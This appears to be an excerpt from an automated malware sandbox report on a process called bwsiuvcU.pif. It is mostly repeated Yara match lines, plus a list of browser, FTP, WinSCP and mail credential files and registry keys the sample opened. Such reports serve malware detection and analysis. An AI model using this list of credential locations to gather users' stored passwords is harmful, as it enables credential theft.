Source: Yara match File source: 00000019.00000002.1788431061.0000000025FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1680679015.000000003DE32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2554879629.000000003DD81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1680679015.000000003DE5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1788431061.0000000025FEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2554879629.000000003DDAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: bwsiuvcU.pif PID: 6340, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: bwsiuvcU.pif PID: 2196, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: bwsiuvcU.pif PID: 2324, type: MEMORYSTR
Source: Yara match File source: 27.3.bwsiuvcU.pif.3bd8fed0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.3ede5570.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.26fc9b90.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.284a0f08.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.40260000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.3daa5566.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.3dad5566.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.3ee39b90.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.409b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.3ed35570.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.284a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.3daa5566.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.26f76478.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.40260000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.3.bwsiuvcU.pif.3bd8fed0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.3daa646e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.40350000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.3dad646e.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.3daa646e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.3ed35570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.26f75570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.3ede5570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.25dd646e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.28c40000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.3ede6478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.28c40000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.3ed36478.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.40260f08.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.3ed36478.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.3ed89b90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.26f75570.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.25dd646e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.284a0f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.25dd5566.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.284a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.40350f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.409c0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.26f76478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.409b0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.40350000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.409c0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.3dad5566.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.26fc9b90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.40350f08.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.25dd5566.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.3ed89b90.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.3ede6478.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.bwsiuvcU.pif.3bdc99c8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.bwsiuvcU.pif.3bdc99c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.1680345757.000000003DA95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1682459055.00000000409C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1787983024.0000000025D95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2555827704.0000000040350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1791650361.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2556241672.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.1719620200.000000003BD8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.1516343993.000000003BDC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2554498447.000000003DA65000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1681909755.0000000040260000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.1634916828.0000000023FF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1681582310.000000003EDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2555544877.000000003ED31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1792368001.0000000028C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1790805820.0000000026F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 23.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.1639938993.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.1494437975.000000007EB10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1639938993.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1732584170.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000001.1707928386.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2524457336.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1519434101.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000001.1494452738.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2524457336.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000001.1624046151.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000001.1624046151.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000001.1494452738.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000001.1707928386.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000001.1707928386.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1732584170.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\Public\Libraries\bwsiuvcU.pif File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\Public\Libraries\bwsiuvcU.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\bwsiuvcU.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\Public\Libraries\bwsiuvcU.pif File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\Public\Libraries\bwsiuvcU.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\bwsiuvcU.pif File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\Public\Libraries\bwsiuvcU.pif File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match File source: 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: bwsiuvcU.pif PID: 6340, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: bwsiuvcU.pif PID: 2196, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: bwsiuvcU.pif PID: 2324, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000019.00000002.1788431061.0000000025FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1680679015.000000003DE32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2554879629.000000003DD81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1680679015.000000003DE5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1788431061.0000000025FEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2554879629.000000003DDAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: bwsiuvcU.pif PID: 6340, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: bwsiuvcU.pif PID: 2196, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: bwsiuvcU.pif PID: 2324, type: MEMORYSTR
Source: Yara match File source: 27.3.bwsiuvcU.pif.3bd8fed0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.3ede5570.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.26fc9b90.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.284a0f08.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.40260000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.3daa5566.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.3dad5566.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.3ee39b90.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.409b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.3ed35570.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.284a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.3daa5566.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.26f76478.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.40260000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.3.bwsiuvcU.pif.3bd8fed0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.3daa646e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.40350000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.3dad646e.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.3daa646e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.3ed35570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.26f75570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.3ede5570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.25dd646e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.28c40000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.3ede6478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.28c40000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.3ed36478.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.40260f08.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.3ed36478.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.3ed89b90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.26f75570.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.25dd646e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.284a0f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.25dd5566.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.284a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.40350f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.409c0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.26f76478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.409b0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.40350000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.409c0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.3dad5566.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.26fc9b90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.40350f08.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.25dd5566.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.3ed89b90.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.3ede6478.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.bwsiuvcU.pif.3bdc99c8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.bwsiuvcU.pif.3bdc99c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.1680345757.000000003DA95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1682459055.00000000409C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1787983024.0000000025D95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2555827704.0000000040350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1791650361.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2556241672.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.1719620200.000000003BD8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.1516343993.000000003BDC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2554498447.000000003DA65000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1681909755.0000000040260000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.1634916828.0000000023FF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1681582310.000000003EDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2555544877.000000003ED31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1792368001.0000000028C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1790805820.0000000026F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 23.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.1639938993.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.1494437975.000000007EB10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1639938993.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1732584170.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000001.1707928386.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2524457336.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1519434101.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000001.1494452738.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2524457336.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000001.1624046151.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000001.1624046151.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000001.1494452738.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000001.1707928386.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000001.1707928386.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1732584170.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY